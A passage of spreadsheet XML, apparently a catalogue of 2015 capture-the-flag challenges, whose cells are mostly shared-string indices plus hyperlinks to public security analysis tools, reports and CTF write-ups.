      <c r="P195" s="29"/>
      <c r="Q195" s="29"/>
      <c r="R195" s="29"/>
      <c r="S195" s="29"/>
      <c r="T195" s="29"/>
      <c r="U195" s="29"/>
      <c r="V195" s="29"/>
      <c r="W195" s="29"/>
      <c r="X195" s="29"/>
      <c r="Y195" s="29"/>
      <c r="Z195" s="29"/>
    </row>
    <row r="196">
      <c r="A196" s="70" t="s">
        <v>1040</v>
      </c>
      <c r="B196" s="71">
        <v>2015.0</v>
      </c>
      <c r="C196" s="70" t="s">
        <v>3293</v>
      </c>
      <c r="D196" s="70" t="s">
        <v>23</v>
      </c>
      <c r="E196" s="70" t="s">
        <v>2232</v>
      </c>
      <c r="F196" s="70" t="s">
        <v>3294</v>
      </c>
      <c r="G196" s="70" t="s">
        <v>3295</v>
      </c>
      <c r="H196" s="70" t="s">
        <v>3296</v>
      </c>
      <c r="I196" s="29"/>
      <c r="J196" s="29"/>
      <c r="K196" s="29"/>
      <c r="L196" s="29"/>
      <c r="M196" s="29"/>
      <c r="N196" s="29"/>
      <c r="O196" s="29"/>
      <c r="P196" s="29"/>
      <c r="Q196" s="29"/>
      <c r="R196" s="29"/>
      <c r="S196" s="29"/>
      <c r="T196" s="29"/>
      <c r="U196" s="29"/>
      <c r="V196" s="29"/>
      <c r="W196" s="29"/>
      <c r="X196" s="29"/>
      <c r="Y196" s="29"/>
      <c r="Z196" s="29"/>
    </row>
    <row r="197">
      <c r="A197" s="70" t="s">
        <v>1040</v>
      </c>
      <c r="B197" s="71">
        <v>2015.0</v>
      </c>
      <c r="C197" s="70" t="s">
        <v>3298</v>
      </c>
      <c r="D197" s="70" t="s">
        <v>128</v>
      </c>
      <c r="E197" s="70" t="s">
        <v>3300</v>
      </c>
      <c r="F197" s="70" t="s">
        <v>3302</v>
      </c>
      <c r="G197" s="70" t="s">
        <v>3303</v>
      </c>
      <c r="H197" s="72"/>
      <c r="I197" s="29"/>
      <c r="J197" s="29"/>
      <c r="K197" s="29"/>
      <c r="L197" s="29"/>
      <c r="M197" s="29"/>
      <c r="N197" s="29"/>
      <c r="O197" s="29"/>
      <c r="P197" s="29"/>
      <c r="Q197" s="29"/>
      <c r="R197" s="29"/>
      <c r="S197" s="29"/>
      <c r="T197" s="29"/>
      <c r="U197" s="29"/>
      <c r="V197" s="29"/>
      <c r="W197" s="29"/>
      <c r="X197" s="29"/>
      <c r="Y197" s="29"/>
      <c r="Z197" s="29"/>
    </row>
    <row r="198">
      <c r="A198" s="70" t="s">
        <v>1040</v>
      </c>
      <c r="B198" s="71">
        <v>2015.0</v>
      </c>
      <c r="C198" s="70" t="s">
        <v>3304</v>
      </c>
      <c r="D198" s="70" t="s">
        <v>23</v>
      </c>
      <c r="E198" s="70" t="s">
        <v>2370</v>
      </c>
      <c r="F198" s="70" t="s">
        <v>3305</v>
      </c>
      <c r="G198" s="70" t="s">
        <v>3306</v>
      </c>
      <c r="H198" s="168" t="s">
        <v>3308</v>
      </c>
      <c r="I198" s="29"/>
      <c r="J198" s="29"/>
      <c r="K198" s="29"/>
      <c r="L198" s="29"/>
      <c r="M198" s="29"/>
      <c r="N198" s="29"/>
      <c r="O198" s="29"/>
      <c r="P198" s="29"/>
      <c r="Q198" s="29"/>
      <c r="R198" s="29"/>
      <c r="S198" s="29"/>
      <c r="T198" s="29"/>
      <c r="U198" s="29"/>
      <c r="V198" s="29"/>
      <c r="W198" s="29"/>
      <c r="X198" s="29"/>
      <c r="Y198" s="29"/>
      <c r="Z198" s="29"/>
    </row>
    <row r="199">
      <c r="A199" s="70" t="s">
        <v>1040</v>
      </c>
      <c r="B199" s="71">
        <v>2015.0</v>
      </c>
      <c r="C199" s="70" t="s">
        <v>3310</v>
      </c>
      <c r="D199" s="70" t="s">
        <v>128</v>
      </c>
      <c r="E199" s="72"/>
      <c r="F199" s="70" t="s">
        <v>3312</v>
      </c>
      <c r="G199" s="168" t="s">
        <v>3313</v>
      </c>
      <c r="H199" s="72"/>
      <c r="I199" s="29"/>
      <c r="J199" s="29"/>
      <c r="K199" s="29"/>
      <c r="L199" s="29"/>
      <c r="M199" s="29"/>
      <c r="N199" s="29"/>
      <c r="O199" s="29"/>
      <c r="P199" s="29"/>
      <c r="Q199" s="29"/>
      <c r="R199" s="29"/>
      <c r="S199" s="29"/>
      <c r="T199" s="29"/>
      <c r="U199" s="29"/>
      <c r="V199" s="29"/>
      <c r="W199" s="29"/>
      <c r="X199" s="29"/>
      <c r="Y199" s="29"/>
      <c r="Z199" s="29"/>
    </row>
    <row r="200">
      <c r="A200" s="70" t="s">
        <v>1040</v>
      </c>
      <c r="B200" s="71">
        <v>2015.0</v>
      </c>
      <c r="C200" s="70" t="s">
        <v>3317</v>
      </c>
      <c r="D200" s="70" t="s">
        <v>767</v>
      </c>
      <c r="E200" s="72"/>
      <c r="F200" s="70" t="s">
        <v>3318</v>
      </c>
      <c r="G200" s="70" t="s">
        <v>3319</v>
      </c>
      <c r="H200" s="72"/>
      <c r="I200" s="29"/>
      <c r="J200" s="29"/>
      <c r="K200" s="29"/>
      <c r="L200" s="29"/>
      <c r="M200" s="29"/>
      <c r="N200" s="29"/>
      <c r="O200" s="29"/>
      <c r="P200" s="29"/>
      <c r="Q200" s="29"/>
      <c r="R200" s="29"/>
      <c r="S200" s="29"/>
      <c r="T200" s="29"/>
      <c r="U200" s="29"/>
      <c r="V200" s="29"/>
      <c r="W200" s="29"/>
      <c r="X200" s="29"/>
      <c r="Y200" s="29"/>
      <c r="Z200" s="29"/>
    </row>
    <row r="201">
      <c r="A201" s="70" t="s">
        <v>1040</v>
      </c>
      <c r="B201" s="71">
        <v>2015.0</v>
      </c>
      <c r="C201" s="70" t="s">
        <v>3320</v>
      </c>
      <c r="D201" s="70" t="s">
        <v>767</v>
      </c>
      <c r="E201" s="70" t="s">
        <v>3321</v>
      </c>
      <c r="F201" s="70" t="s">
        <v>3322</v>
      </c>
      <c r="G201" s="70" t="s">
        <v>3324</v>
      </c>
      <c r="H201" s="72"/>
      <c r="I201" s="29"/>
      <c r="J201" s="29"/>
      <c r="K201" s="29"/>
      <c r="L201" s="29"/>
      <c r="M201" s="29"/>
      <c r="N201" s="29"/>
      <c r="O201" s="29"/>
      <c r="P201" s="29"/>
      <c r="Q201" s="29"/>
      <c r="R201" s="29"/>
      <c r="S201" s="29"/>
      <c r="T201" s="29"/>
      <c r="U201" s="29"/>
      <c r="V201" s="29"/>
      <c r="W201" s="29"/>
      <c r="X201" s="29"/>
      <c r="Y201" s="29"/>
      <c r="Z201" s="29"/>
    </row>
    <row r="202">
      <c r="A202" s="70" t="s">
        <v>1040</v>
      </c>
      <c r="B202" s="71">
        <v>2015.0</v>
      </c>
      <c r="C202" s="70" t="s">
        <v>3326</v>
      </c>
      <c r="D202" s="70" t="s">
        <v>767</v>
      </c>
      <c r="E202" s="70" t="s">
        <v>116</v>
      </c>
      <c r="F202" s="70" t="s">
        <v>3327</v>
      </c>
      <c r="G202" s="70" t="s">
        <v>3328</v>
      </c>
      <c r="H202" s="72"/>
      <c r="I202" s="29"/>
      <c r="J202" s="29"/>
      <c r="K202" s="29"/>
      <c r="L202" s="29"/>
      <c r="M202" s="29"/>
      <c r="N202" s="29"/>
      <c r="O202" s="29"/>
      <c r="P202" s="29"/>
      <c r="Q202" s="29"/>
      <c r="R202" s="29"/>
      <c r="S202" s="29"/>
      <c r="T202" s="29"/>
      <c r="U202" s="29"/>
      <c r="V202" s="29"/>
      <c r="W202" s="29"/>
      <c r="X202" s="29"/>
      <c r="Y202" s="29"/>
      <c r="Z202" s="29"/>
    </row>
    <row r="203">
      <c r="A203" s="70" t="s">
        <v>1040</v>
      </c>
      <c r="B203" s="71">
        <v>2015.0</v>
      </c>
      <c r="C203" s="70" t="s">
        <v>3330</v>
      </c>
      <c r="D203" s="70" t="s">
        <v>23</v>
      </c>
      <c r="E203" s="72"/>
      <c r="F203" s="70" t="s">
        <v>3331</v>
      </c>
      <c r="G203" s="70" t="s">
        <v>3332</v>
      </c>
      <c r="H203" s="72"/>
      <c r="I203" s="29"/>
      <c r="J203" s="29"/>
      <c r="K203" s="29"/>
      <c r="L203" s="29"/>
      <c r="M203" s="29"/>
      <c r="N203" s="29"/>
      <c r="O203" s="29"/>
      <c r="P203" s="29"/>
      <c r="Q203" s="29"/>
      <c r="R203" s="29"/>
      <c r="S203" s="29"/>
      <c r="T203" s="29"/>
      <c r="U203" s="29"/>
      <c r="V203" s="29"/>
      <c r="W203" s="29"/>
      <c r="X203" s="29"/>
      <c r="Y203" s="29"/>
      <c r="Z203" s="29"/>
    </row>
    <row r="204">
      <c r="A204" s="70" t="s">
        <v>1040</v>
      </c>
      <c r="B204" s="71">
        <v>2015.0</v>
      </c>
      <c r="C204" s="70" t="s">
        <v>3333</v>
      </c>
      <c r="D204" s="70" t="s">
        <v>767</v>
      </c>
      <c r="E204" s="70" t="s">
        <v>3321</v>
      </c>
      <c r="F204" s="70" t="s">
        <v>3334</v>
      </c>
      <c r="G204" s="70" t="s">
        <v>3335</v>
      </c>
      <c r="H204" s="72"/>
      <c r="I204" s="29"/>
      <c r="J204" s="29"/>
      <c r="K204" s="29"/>
      <c r="L204" s="29"/>
      <c r="M204" s="29"/>
      <c r="N204" s="29"/>
      <c r="O204" s="29"/>
      <c r="P204" s="29"/>
      <c r="Q204" s="29"/>
      <c r="R204" s="29"/>
      <c r="S204" s="29"/>
      <c r="T204" s="29"/>
      <c r="U204" s="29"/>
      <c r="V204" s="29"/>
      <c r="W204" s="29"/>
      <c r="X204" s="29"/>
      <c r="Y204" s="29"/>
      <c r="Z204" s="29"/>
    </row>
    <row r="205">
      <c r="A205" s="23" t="s">
        <v>1111</v>
      </c>
      <c r="B205" s="24">
        <v>2015.0</v>
      </c>
      <c r="C205" s="23" t="s">
        <v>3336</v>
      </c>
      <c r="D205" s="23" t="s">
        <v>23</v>
      </c>
      <c r="E205" s="23" t="s">
        <v>3337</v>
      </c>
      <c r="F205" s="23" t="s">
        <v>3338</v>
      </c>
      <c r="G205" s="23" t="s">
        <v>3339</v>
      </c>
      <c r="H205" s="23" t="s">
        <v>3340</v>
      </c>
      <c r="I205" s="23" t="s">
        <v>3341</v>
      </c>
      <c r="J205" s="29"/>
      <c r="K205" s="29"/>
      <c r="L205" s="29"/>
      <c r="M205" s="29"/>
      <c r="N205" s="29"/>
      <c r="O205" s="29"/>
      <c r="P205" s="29"/>
      <c r="Q205" s="29"/>
      <c r="R205" s="29"/>
      <c r="S205" s="29"/>
      <c r="T205" s="29"/>
      <c r="U205" s="29"/>
      <c r="V205" s="29"/>
      <c r="W205" s="29"/>
      <c r="X205" s="29"/>
      <c r="Y205" s="29"/>
      <c r="Z205" s="29"/>
    </row>
    <row r="206">
      <c r="A206" s="23" t="s">
        <v>1111</v>
      </c>
      <c r="B206" s="24">
        <v>2015.0</v>
      </c>
      <c r="C206" s="23" t="s">
        <v>3343</v>
      </c>
      <c r="D206" s="23" t="s">
        <v>23</v>
      </c>
      <c r="E206" s="23" t="s">
        <v>1222</v>
      </c>
      <c r="F206" s="23" t="s">
        <v>3345</v>
      </c>
      <c r="G206" s="23" t="s">
        <v>3347</v>
      </c>
      <c r="H206" s="23" t="s">
        <v>2605</v>
      </c>
      <c r="I206" s="28"/>
      <c r="J206" s="29"/>
      <c r="K206" s="29"/>
      <c r="L206" s="29"/>
      <c r="M206" s="29"/>
      <c r="N206" s="29"/>
      <c r="O206" s="29"/>
      <c r="P206" s="29"/>
      <c r="Q206" s="29"/>
      <c r="R206" s="29"/>
      <c r="S206" s="29"/>
      <c r="T206" s="29"/>
      <c r="U206" s="29"/>
      <c r="V206" s="29"/>
      <c r="W206" s="29"/>
      <c r="X206" s="29"/>
      <c r="Y206" s="29"/>
      <c r="Z206" s="29"/>
    </row>
    <row r="207">
      <c r="A207" s="23" t="s">
        <v>1111</v>
      </c>
      <c r="B207" s="24">
        <v>2015.0</v>
      </c>
      <c r="C207" s="23" t="s">
        <v>3348</v>
      </c>
      <c r="D207" s="23" t="s">
        <v>23</v>
      </c>
      <c r="E207" s="28"/>
      <c r="F207" s="23" t="s">
        <v>3349</v>
      </c>
      <c r="G207" s="23" t="s">
        <v>3350</v>
      </c>
      <c r="J207" s="29"/>
      <c r="K207" s="29"/>
      <c r="L207" s="29"/>
      <c r="M207" s="29"/>
      <c r="N207" s="29"/>
      <c r="O207" s="29"/>
      <c r="P207" s="29"/>
      <c r="Q207" s="29"/>
      <c r="R207" s="29"/>
      <c r="S207" s="29"/>
      <c r="T207" s="29"/>
      <c r="U207" s="29"/>
      <c r="V207" s="29"/>
      <c r="W207" s="29"/>
      <c r="X207" s="29"/>
      <c r="Y207" s="29"/>
      <c r="Z207" s="29"/>
    </row>
    <row r="208">
      <c r="A208" s="23" t="s">
        <v>1111</v>
      </c>
      <c r="B208" s="24">
        <v>2015.0</v>
      </c>
      <c r="C208" s="23" t="s">
        <v>3351</v>
      </c>
      <c r="D208" s="23" t="s">
        <v>128</v>
      </c>
      <c r="E208" s="23" t="s">
        <v>2370</v>
      </c>
      <c r="F208" s="23" t="s">
        <v>3352</v>
      </c>
      <c r="G208" s="23" t="s">
        <v>3353</v>
      </c>
      <c r="J208" s="29"/>
      <c r="K208" s="29"/>
      <c r="L208" s="29"/>
      <c r="M208" s="29"/>
      <c r="N208" s="29"/>
      <c r="O208" s="29"/>
      <c r="P208" s="29"/>
      <c r="Q208" s="29"/>
      <c r="R208" s="29"/>
      <c r="S208" s="29"/>
      <c r="T208" s="29"/>
      <c r="U208" s="29"/>
      <c r="V208" s="29"/>
      <c r="W208" s="29"/>
      <c r="X208" s="29"/>
      <c r="Y208" s="29"/>
      <c r="Z208" s="29"/>
    </row>
    <row r="209">
      <c r="A209" s="23" t="s">
        <v>1111</v>
      </c>
      <c r="B209" s="24">
        <v>2015.0</v>
      </c>
      <c r="C209" s="23" t="s">
        <v>3357</v>
      </c>
      <c r="D209" s="23" t="s">
        <v>48</v>
      </c>
      <c r="E209" s="28"/>
      <c r="F209" s="23" t="s">
        <v>3358</v>
      </c>
      <c r="G209" s="23" t="s">
        <v>3359</v>
      </c>
      <c r="J209" s="29"/>
      <c r="K209" s="29"/>
      <c r="L209" s="29"/>
      <c r="M209" s="29"/>
      <c r="N209" s="29"/>
      <c r="O209" s="29"/>
      <c r="P209" s="29"/>
      <c r="Q209" s="29"/>
      <c r="R209" s="29"/>
      <c r="S209" s="29"/>
      <c r="T209" s="29"/>
      <c r="U209" s="29"/>
      <c r="V209" s="29"/>
      <c r="W209" s="29"/>
      <c r="X209" s="29"/>
      <c r="Y209" s="29"/>
      <c r="Z209" s="29"/>
    </row>
    <row r="210">
      <c r="A210" s="17">
        <v>42552.0</v>
      </c>
      <c r="B210" s="65"/>
      <c r="C210" s="65"/>
      <c r="D210" s="65"/>
      <c r="E210" s="9"/>
      <c r="F210" s="65"/>
      <c r="G210" s="65"/>
      <c r="H210" s="66"/>
      <c r="I210" s="9"/>
      <c r="J210" s="9"/>
      <c r="K210" s="9"/>
      <c r="L210" s="9"/>
      <c r="M210" s="9"/>
      <c r="N210" s="9"/>
      <c r="O210" s="9"/>
      <c r="P210" s="9"/>
      <c r="Q210" s="9"/>
      <c r="R210" s="9"/>
      <c r="S210" s="9"/>
      <c r="T210" s="9"/>
      <c r="U210" s="9"/>
      <c r="V210" s="9"/>
      <c r="W210" s="9"/>
      <c r="X210" s="9"/>
      <c r="Y210" s="9"/>
      <c r="Z210" s="9"/>
    </row>
    <row r="211">
      <c r="A211" s="5" t="s">
        <v>348</v>
      </c>
      <c r="B211" s="43">
        <v>2015.0</v>
      </c>
      <c r="C211" s="5" t="s">
        <v>3363</v>
      </c>
      <c r="D211" s="5" t="s">
        <v>48</v>
      </c>
      <c r="E211" s="5" t="s">
        <v>3271</v>
      </c>
      <c r="F211" s="5" t="s">
        <v>3364</v>
      </c>
      <c r="G211" s="5" t="s">
        <v>3365</v>
      </c>
      <c r="H211" s="5" t="s">
        <v>3366</v>
      </c>
    </row>
    <row r="212">
      <c r="A212" s="5" t="s">
        <v>348</v>
      </c>
      <c r="B212" s="43">
        <v>2015.0</v>
      </c>
      <c r="C212" s="5" t="s">
        <v>3367</v>
      </c>
      <c r="D212" s="5" t="s">
        <v>128</v>
      </c>
      <c r="E212" s="5" t="s">
        <v>3368</v>
      </c>
      <c r="F212" s="5" t="s">
        <v>3369</v>
      </c>
      <c r="G212" s="5" t="s">
        <v>3370</v>
      </c>
      <c r="H212" s="5" t="s">
        <v>3371</v>
      </c>
    </row>
    <row r="213">
      <c r="A213" s="5" t="s">
        <v>348</v>
      </c>
      <c r="B213" s="43">
        <v>2015.0</v>
      </c>
      <c r="C213" s="5" t="s">
        <v>3373</v>
      </c>
      <c r="D213" s="5" t="s">
        <v>48</v>
      </c>
      <c r="E213" s="5" t="s">
        <v>2338</v>
      </c>
      <c r="F213" s="5" t="s">
        <v>3364</v>
      </c>
      <c r="G213" s="5" t="s">
        <v>3375</v>
      </c>
      <c r="H213" s="5" t="s">
        <v>3376</v>
      </c>
    </row>
    <row r="214">
      <c r="A214" s="40" t="s">
        <v>1709</v>
      </c>
      <c r="B214" s="40">
        <v>2015.0</v>
      </c>
      <c r="C214" s="40" t="s">
        <v>3377</v>
      </c>
      <c r="D214" s="40" t="s">
        <v>48</v>
      </c>
      <c r="E214" s="40" t="s">
        <v>3378</v>
      </c>
      <c r="F214" s="40" t="s">
        <v>3379</v>
      </c>
      <c r="G214" s="40" t="s">
        <v>3380</v>
      </c>
    </row>
    <row r="215">
      <c r="A215" s="40" t="s">
        <v>1709</v>
      </c>
      <c r="B215" s="40">
        <v>2015.0</v>
      </c>
      <c r="C215" s="40" t="s">
        <v>3382</v>
      </c>
      <c r="D215" s="40" t="s">
        <v>48</v>
      </c>
      <c r="E215" s="40" t="s">
        <v>3384</v>
      </c>
      <c r="F215" s="40" t="s">
        <v>3385</v>
      </c>
      <c r="G215" s="40" t="s">
        <v>3386</v>
      </c>
      <c r="H215" s="40" t="s">
        <v>3387</v>
      </c>
    </row>
    <row r="216">
      <c r="A216" s="40" t="s">
        <v>1719</v>
      </c>
      <c r="B216" s="40">
        <v>2015.0</v>
      </c>
      <c r="C216" s="40" t="s">
        <v>3388</v>
      </c>
      <c r="D216" s="40" t="s">
        <v>128</v>
      </c>
      <c r="E216" s="40" t="s">
        <v>1222</v>
      </c>
      <c r="F216" s="40" t="s">
        <v>3390</v>
      </c>
      <c r="G216" s="40" t="s">
        <v>3392</v>
      </c>
    </row>
    <row r="217">
      <c r="A217" s="40" t="s">
        <v>1132</v>
      </c>
      <c r="B217" s="31">
        <v>2015.0</v>
      </c>
      <c r="C217" s="30" t="s">
        <v>3393</v>
      </c>
      <c r="D217" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E217" s="30" t="s">
        <v>3181</v>
      </c>
      <c r="F217" s="35" t="s">
        <v>3394</v>
      </c>
      <c r="G217" s="34" t="s">
        <v>3395</v>
      </c>
      <c r="H217" s="33" t="str">
        <f>HYPERLINK("https://github.com/MITRECND/chopshop","Chopshop framework")</f>
        <v>Chopshop framework</v>
      </c>
      <c r="I217" s="33" t="str">
        <f>HYPERLINK("https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-poison-ivy.pdf","Poison Ivy Backdoor PDF")</f>
        <v>Poison Ivy Backdoor PDF</v>
      </c>
      <c r="J217" s="33" t="str">
        <f>HYPERLINK("https://en.wikipedia.org/wiki/Camellia_(cipher)","Camellia block cipher")</f>
        <v>Camellia block cipher</v>
      </c>
      <c r="K217" s="33" t="str">
        <f>HYPERLINK("https://github.com/MITRECND/chopshop/blob/master/modules/poisonivy_23x.py","Poisonivy_23x.py")</f>
        <v>Poisonivy_23x.py</v>
      </c>
    </row>
    <row r="218">
      <c r="A218" s="30" t="s">
        <v>1132</v>
      </c>
      <c r="B218" s="31">
        <v>2015.0</v>
      </c>
      <c r="C218" s="30" t="s">
        <v>3404</v>
      </c>
      <c r="D218" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E218" s="30" t="s">
        <v>3405</v>
      </c>
      <c r="F218" s="30" t="s">
        <v>3406</v>
      </c>
      <c r="G218" s="35" t="s">
        <v>3407</v>
      </c>
      <c r="H218" s="33" t="str">
        <f>HYPERLINK("https://code.google.com/archive/p/origami-pdf/wikis/GettingStarted.wiki","Origami Framework / PDF Walker (GUI)")</f>
        <v>Origami Framework / PDF Walker (GUI)</v>
      </c>
      <c r="I218" s="33" t="str">
        <f>HYPERLINK("https://blog.didierstevens.com/2015/04/16/pdf-parser-a-method-to-manipulate-pdfs-part-1/","Manipulating PDF's")</f>
        <v>Manipulating PDF's</v>
      </c>
    </row>
    <row r="219">
      <c r="A219" s="40" t="s">
        <v>1719</v>
      </c>
      <c r="B219" s="40">
        <v>2015.0</v>
      </c>
      <c r="C219" s="40" t="s">
        <v>3412</v>
      </c>
      <c r="D219" s="40" t="s">
        <v>23</v>
      </c>
      <c r="E219" s="40" t="s">
        <v>3413</v>
      </c>
      <c r="F219" s="40" t="s">
        <v>3414</v>
      </c>
      <c r="G219" s="40" t="s">
        <v>3415</v>
      </c>
      <c r="H219" s="40" t="s">
        <v>3416</v>
      </c>
    </row>
    <row r="220">
      <c r="A220" s="5" t="s">
        <v>1140</v>
      </c>
      <c r="B220" s="43">
        <v>2015.0</v>
      </c>
      <c r="C220" s="5" t="s">
        <v>3418</v>
      </c>
      <c r="D220" s="5" t="s">
        <v>23</v>
      </c>
      <c r="E220" s="5" t="s">
        <v>3271</v>
      </c>
      <c r="F220" s="5" t="s">
        <v>3420</v>
      </c>
      <c r="G220" s="5" t="s">
        <v>3422</v>
      </c>
      <c r="H220" s="3"/>
    </row>
    <row r="221">
      <c r="A221" s="5" t="s">
        <v>1140</v>
      </c>
      <c r="B221" s="43">
        <v>2015.0</v>
      </c>
      <c r="C221" s="5" t="s">
        <v>3424</v>
      </c>
      <c r="D221" s="5" t="s">
        <v>48</v>
      </c>
      <c r="E221" s="5" t="s">
        <v>3425</v>
      </c>
      <c r="F221" s="5" t="s">
        <v>3426</v>
      </c>
      <c r="G221" s="5" t="s">
        <v>3427</v>
      </c>
      <c r="H221" s="56" t="s">
        <v>3428</v>
      </c>
    </row>
    <row r="222">
      <c r="A222" s="5" t="s">
        <v>1140</v>
      </c>
      <c r="B222" s="43">
        <v>2015.0</v>
      </c>
      <c r="C222" s="5" t="s">
        <v>3431</v>
      </c>
      <c r="D222" s="5" t="s">
        <v>48</v>
      </c>
      <c r="E222" s="5" t="s">
        <v>3321</v>
      </c>
      <c r="F222" s="5" t="s">
        <v>3432</v>
      </c>
      <c r="G222" s="5" t="s">
        <v>3433</v>
      </c>
      <c r="H222" s="3"/>
    </row>
    <row r="223">
      <c r="A223" s="5" t="s">
        <v>1140</v>
      </c>
      <c r="B223" s="43">
        <v>2015.0</v>
      </c>
      <c r="C223" s="5" t="s">
        <v>3434</v>
      </c>
      <c r="D223" s="5" t="s">
        <v>23</v>
      </c>
      <c r="E223" s="3"/>
      <c r="F223" s="5" t="s">
        <v>3435</v>
      </c>
      <c r="G223" s="5" t="s">
        <v>3436</v>
      </c>
    </row>
    <row r="224">
      <c r="A224" s="5" t="s">
        <v>1140</v>
      </c>
      <c r="B224" s="43">
        <v>2015.0</v>
      </c>
      <c r="C224" s="5" t="s">
        <v>3437</v>
      </c>
      <c r="D224" s="5" t="s">
        <v>23</v>
      </c>
      <c r="E224" s="3"/>
      <c r="F224" s="5" t="s">
        <v>3438</v>
      </c>
      <c r="G224" s="5" t="s">
        <v>3439</v>
      </c>
    </row>
    <row r="225">
      <c r="A225" s="5" t="s">
        <v>1140</v>
      </c>
      <c r="B225" s="43">
        <v>2015.0</v>
      </c>
      <c r="C225" s="5" t="s">
        <v>3440</v>
      </c>
      <c r="D225" s="5" t="s">
        <v>767</v>
      </c>
      <c r="E225" s="3"/>
      <c r="F225" s="5" t="s">
        <v>3441</v>
      </c>
      <c r="G225" s="5" t="s">
        <v>3442</v>
      </c>
    </row>
    <row r="226">
      <c r="A226" s="5" t="s">
        <v>1140</v>
      </c>
      <c r="B226" s="43">
        <v>2015.0</v>
      </c>
      <c r="C226" s="5" t="s">
        <v>3443</v>
      </c>
      <c r="D226" s="5" t="s">
        <v>767</v>
      </c>
      <c r="E226" s="3"/>
      <c r="F226" s="5" t="s">
        <v>3444</v>
      </c>
      <c r="G226" s="5" t="s">
        <v>3446</v>
      </c>
    </row>
    <row r="227">
      <c r="A227" s="5" t="s">
        <v>1140</v>
      </c>
      <c r="B227" s="43">
        <v>2015.0</v>
      </c>
      <c r="C227" s="5" t="s">
        <v>3448</v>
      </c>
      <c r="D227" s="5" t="s">
        <v>767</v>
      </c>
      <c r="E227" s="3"/>
      <c r="F227" s="5" t="s">
        <v>3450</v>
      </c>
      <c r="G227" s="5" t="s">
        <v>3451</v>
      </c>
    </row>
    <row r="228">
      <c r="A228" s="30" t="s">
        <v>1159</v>
      </c>
      <c r="B228" s="31">
        <v>2015.0</v>
      </c>
      <c r="C228" s="30" t="s">
        <v>3452</v>
      </c>
      <c r="D228" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E228" s="30" t="s">
        <v>3181</v>
      </c>
      <c r="F228" s="35" t="s">
        <v>3453</v>
      </c>
      <c r="G228" s="30" t="s">
        <v>3454</v>
      </c>
      <c r="H228" s="33" t="str">
        <f>HYPERLINK("http://ridiculousfish.com/hexfiend/","HexFiend")</f>
        <v>HexFiend</v>
      </c>
      <c r="I228" s="33" t="str">
        <f>HYPERLINK("https://www.synalysis.net/","Synalysis")</f>
        <v>Synalysis</v>
      </c>
      <c r="J228" s="33" t="str">
        <f>HYPERLINK("https://github.com/USArmyResearchLab/Dshell","DShell Stream Re-assembly")</f>
        <v>DShell Stream Re-assembly</v>
      </c>
      <c r="K228" s="30"/>
    </row>
    <row r="229">
      <c r="A229" s="30" t="s">
        <v>1159</v>
      </c>
      <c r="B229" s="31">
        <v>2015.0</v>
      </c>
      <c r="C229" s="30" t="s">
        <v>3458</v>
      </c>
      <c r="D229" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E229" s="30" t="s">
        <v>3459</v>
      </c>
      <c r="F229" s="35" t="s">
        <v>3460</v>
      </c>
      <c r="G229" s="34" t="s">
        <v>3461</v>
      </c>
      <c r="H229" s="33" t="str">
        <f>HYPERLINK("http://www.cheatengine.org/","Cheat Engine")</f>
        <v>Cheat Engine</v>
      </c>
      <c r="I229" s="30"/>
    </row>
    <row r="230">
      <c r="A230" s="30" t="s">
        <v>1159</v>
      </c>
      <c r="B230" s="31">
        <v>2015.0</v>
      </c>
      <c r="C230" s="30" t="s">
        <v>3464</v>
      </c>
      <c r="D230" s="30" t="s">
        <v>23</v>
      </c>
      <c r="E230" s="30" t="s">
        <v>3467</v>
      </c>
      <c r="F230" s="35" t="s">
        <v>3468</v>
      </c>
      <c r="G230" s="30" t="s">
        <v>3469</v>
      </c>
      <c r="H230" s="30" t="s">
        <v>3470</v>
      </c>
      <c r="I230" s="30"/>
    </row>
    <row r="231">
      <c r="A231" s="30" t="s">
        <v>1159</v>
      </c>
      <c r="B231" s="31">
        <v>2015.0</v>
      </c>
      <c r="C231" s="30" t="s">
        <v>3471</v>
      </c>
      <c r="D231" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E231" s="30" t="s">
        <v>151</v>
      </c>
      <c r="F231" s="35" t="s">
        <v>3472</v>
      </c>
      <c r="G231" s="34" t="s">
        <v>3473</v>
      </c>
      <c r="H231" s="33" t="str">
        <f>HYPERLINK("http://mattmahoney.net/dc/zpaq.html","Zpaq archiver")</f>
        <v>Zpaq archiver</v>
      </c>
      <c r="I231" s="30"/>
    </row>
    <row r="232">
      <c r="A232" s="30" t="s">
        <v>1159</v>
      </c>
      <c r="B232" s="31">
        <v>2015.0</v>
      </c>
      <c r="C232" s="30" t="s">
        <v>3474</v>
      </c>
      <c r="D232" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E232" s="30" t="s">
        <v>3181</v>
      </c>
      <c r="F232" s="35" t="s">
        <v>3475</v>
      </c>
      <c r="G232" s="30" t="s">
        <v>3476</v>
      </c>
      <c r="H232" s="33" t="str">
        <f>HYPERLINK("https://www.unix-ag.uni-kl.de/~conrad/krypto/pkcrack.html","PkCrack")</f>
        <v>PkCrack</v>
      </c>
      <c r="I232" s="33" t="str">
        <f>HYPERLINK("http://www.computing.surrey.ac.uk/personal/st/J.Heather/teaching/crypto/2011/presentations/biham94known.pdf","Known Plaintext Attack PKZIP")</f>
        <v>Known Plaintext Attack PKZIP</v>
      </c>
    </row>
    <row r="233">
      <c r="A233" s="40" t="s">
        <v>167</v>
      </c>
      <c r="B233" s="40">
        <v>2015.0</v>
      </c>
      <c r="C233" s="52" t="s">
        <v>3480</v>
      </c>
      <c r="D233" s="40" t="s">
        <v>23</v>
      </c>
      <c r="F233" s="40" t="s">
        <v>3482</v>
      </c>
      <c r="G233" s="40" t="s">
        <v>3483</v>
      </c>
    </row>
    <row r="234">
      <c r="A234" s="30" t="s">
        <v>1159</v>
      </c>
      <c r="B234" s="31">
        <v>2015.0</v>
      </c>
      <c r="C234" s="30" t="s">
        <v>3485</v>
      </c>
      <c r="D234" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E234" s="30" t="s">
        <v>2641</v>
      </c>
      <c r="F234" s="30" t="s">
        <v>3486</v>
      </c>
      <c r="G234" s="33" t="str">
        <f>HYPERLINK("https://github.com/ctfs/write-ups-2015/blob/master/asis-quals-ctf-2015/stego/blind/pixels.py","Pixels.py")</f>
        <v>Pixels.py</v>
      </c>
      <c r="H234" s="33" t="str">
        <f>HYPERLINK("https://esolangs.org/wiki/Brainloller","What is Brainloller")</f>
